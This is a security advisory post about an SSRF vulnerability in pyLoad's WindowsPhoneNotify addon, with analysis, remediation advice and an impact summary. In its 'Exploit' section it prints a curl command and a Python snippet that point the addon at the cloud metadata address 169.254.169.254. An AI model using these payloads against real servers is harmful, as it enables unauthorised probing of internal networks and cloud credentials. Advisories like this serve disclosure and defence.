Listen to this Post
pyLoad includes the WindowsPhoneNotify plugin addon, which features a send method that initializes an HTTP connection using parameters configured directly by plugin settings. Specifically, an authenticated user holding standard non-admin SETTINGS permissions can modify the pushurl and pushid configurations via the web API because these specific options are excluded from administrative protection lists. Once these parameters are saved and the addon is dynamically enabled without requiring a server restart, any completed file download globally triggers the notification handler. Rather than using pyLoad’s core pycurl client—which enforces outbound connection guards and validates IP addresses—the addon executes requests using Python’s standard http.client.HTTPConnection library. This implementation completely bypasses internal security filtering, allowing attackers to force the server into issuing blind HTTP POST requests targeting restricted internal services, private RFC 1918 subnets, or sensitive cloud metadata IP addresses like 169.254.169.254.
DailyCVE Form:
Platform: Python
Version: <= 0.5.0b3.dev101
Vulnerability : SSRF
Severity: High
date: 2026-04-06
Prediction: Unpatched
What Undercode Say:
Analytics
The vulnerability stems from inconsistent HTTP client usage and inadequate authorization enforcement across configuration management components. While core download paths and pycurl requests incorporate robust IP filtering logic via is_global_address(), auxiliary features like the WindowsPhoneNotify addon rely on unprotected standard library modules (http.client). Furthermore, the authorization model fails to restrict plugin-specific network routing parameters, letting low-privileged users reconfigure critical communication sinks.
Exploit: (Educational Purposes!)
curl -i -s -k -X POST 'http://pyload.target/json/save_config' \
-H 'Cookie: session=<SESSION_COOKIE>' \
--data-urlencode 'category=plugin' \
--data-urlencode 'config={"WindowsPhoneNotify|enabled":"True","WindowsPhoneNotify|pushurl":"169.254.169.254","WindowsPhoneNotify|pushid":"/latest/meta-data/"}'
import http.client
conn = http.client.HTTPConnection("169.254.169.254", 80)
conn.request("POST", "/latest/meta-data/", body="<xml>test</xml>")
response = conn.getresponse()
print(response.status, response.reason)
Protection: from this CVE
Implement centralized outbound request handling that routes all plugin communications through the primary connection guard. Ensure validation checks like `is_global_address()` and `is_global_host()` apply globally to any component initiating network connections. Additionally, expand administrative restrictions to include all plugin configuration fields that accept hostnames, URLs, or file paths.
Impact
Authenticated low-privileged users can abuse this flaw to perform internal reconnaissance, execute port and service discovery on private networks, probe local firewalls, and interact with internal cloud metadata services. Since requests are blind and responses are not returned directly, attackers rely on timing variations or side-channel behaviors to infer internal infrastructure states.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

